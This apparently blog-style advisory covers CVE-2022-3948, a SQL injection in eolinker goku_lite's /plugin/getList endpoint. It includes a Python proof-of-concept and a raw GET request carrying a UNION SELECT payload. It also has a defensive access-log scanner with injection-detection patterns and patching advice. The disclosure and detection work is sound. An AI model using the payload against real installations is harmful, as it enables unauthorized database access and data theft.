eolinker goku_lite, an API management platform, was found to contain a critical SQL injection vulnerability that could allow remote attackers to compromise your data. This article covers what you need to know about CVE-2022-3948: its discovery, impact, and exploit details, and how you can protect yourself.

What is CVE-2022-3948?

CVE-2022-3948 is the official identifier for a critical SQL injection vulnerability discovered in the goku_lite product by eolinker. The flaw is tracked as VDB-213454 and affects the /plugin/getList endpoint, specifically the route/keyword argument. Because attackers can remotely exploit this bug, all internet-accessible installations are at risk.

Why is this Vulnerability Dangerous?

SQL injection allows an attacker to send malicious SQL statements to the application’s database, letting them read, manipulate, or even delete critical data. In the worst case, attackers could gain administrative access or leak sensitive information.

Technical Details

Affected File:
/plugin/getList – The endpoint vulnerable to SQL injection.

Vulnerable Parameter:
route/keyword – User input is not properly sanitized.

Impact:
Data theft, modification, and potential full database compromise.

Proof of Concept Exploit

Below is a simplified Python exploit using requests to demonstrate the vulnerability. You should only test this on systems you own or with explicit permission!

import requests

# Target eolinker goku_lite installation URL
url = "http://target-site.com/plugin/getList"
# SQL injection payload to extract current database user
payload = "' UNION SELECT user(),2,3-- -"
params = {
    "route/keyword": payload
}

# Send the malicious request
response = requests.get(url, params=params)

# Output the results
print("Status Code:", response.status_code)
print("Response Body:\n", response.text)

If the response contains database information or errors, the target is indeed vulnerable.

How Does the Attack Work?

1. The attacker crafts a request in which the route/keyword parameter is set to a malicious SQL fragment.

2. The application inserts the parameter into an SQL query without validation or sanitization.

3. The database executes the unintended statement, revealing sensitive data or compromising the whole system.

An attacker sends the following GET request:

GET /plugin/getList?route/keyword=' UNION SELECT user(),2,3-- -
Host: target-site.com

If the response contains the database user name or other unexpected data, the target is susceptible.

Original References

- VulDB VDB-213454 Advisory
- NVD CVE-2022-3948 Entry
- Exploit Details on ExploitDB (if published)

Update Your eolinker goku_lite Immediately

Check for available security updates from the official repository or your vendor.

Monitor Logs

Look for suspicious activity, such as requests to /plugin/getList whose route/keyword value contains SQL syntax like the UNION SELECT payload shown above.
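A defender-side check for that log-monitoring advice, added here as an example (it is not code from this article or from eolinker): it parses combined-format access-log lines, pulls the route/keyword value out of requests to /plugin/getList, and flags values carrying SQL-injection indicators such as quotes, UNION SELECT, or comment sequences. The log lines are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample lines in combined access-log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [11/Nov/2022:13:20:01 +0000] "GET /plugin/getList?route/keyword=user HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [11/Nov/2022:13:21:17 +0000] "GET /plugin/getList?route/keyword=%27%20UNION%20SELECT%20user()%2C2%2C3--%20- HTTP/1.1" 200 1834 "-" "python-requests/2.28.1"
10.0.0.9 - - [11/Nov/2022:13:21:40 +0000] "GET /plugin/getList?route/keyword=a%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 0 "-" "python-requests/2.28.1"
10.0.0.7 - - [11/Nov/2022:13:22:03 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status code of a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Indicators of SQL injection in the decoded parameter value; tune to cut false positives.
SQLI_PATTERNS = [
    r"['\"]",                          # quote that breaks out of a string literal
    r"\bUNION\b\s+(ALL\s+)?SELECT\b",  # UNION-based extraction, as in the public PoC
    r"--|/\*|#",                       # comment sequences that truncate the rest of the query
    r"\bOR\b\s+\S+\s*=\s*\S+",         # tautologies such as '1'='1
]
SQLI_RE = re.compile("|".join(SQLI_PATTERNS), re.IGNORECASE)


def check_request(target):
    """Return the decoded route/keyword value if it looks like SQL injection, else None."""
    parts = urlsplit(target)
    if parts.path != "/plugin/getList":
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("route/keyword", []):
        value = unquote_plus(raw)  # second decode catches double-encoded payloads (%2527)
        if SQLI_RE.search(value):
            return value
    return None


def scan_log(text):
    """Return (ip, timestamp, status, payload) for each suspicious request to /plugin/getList."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        payload = check_request(m.group("target"))
        if payload is not None:
            hits.append((m.group("ip"), m.group("ts"), int(m.group("status")), payload))
    return hits
```

Run scan_log() over the text of your web server's access log; each hit gives the source IP, timestamp, response status and decoded payload, so repeated 500s from one client against this endpoint stand out.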

Conclusion

CVE-2022-3948 (VDB-213454) is a critical and actively exploited SQL injection vulnerability in eolinker goku_lite. If you’re running this software, make updating and patching a priority to protect your data—and always restrict remote access if possible.

Further Reading

- General SQL Injection Explanation – OWASP
- How to Fix SQL Injection – Github Gist Guide

Timeline

Published on: 11/11/2022 13:15:00 UTC
Last modified on: 11/15/2022 21:05:00 UTC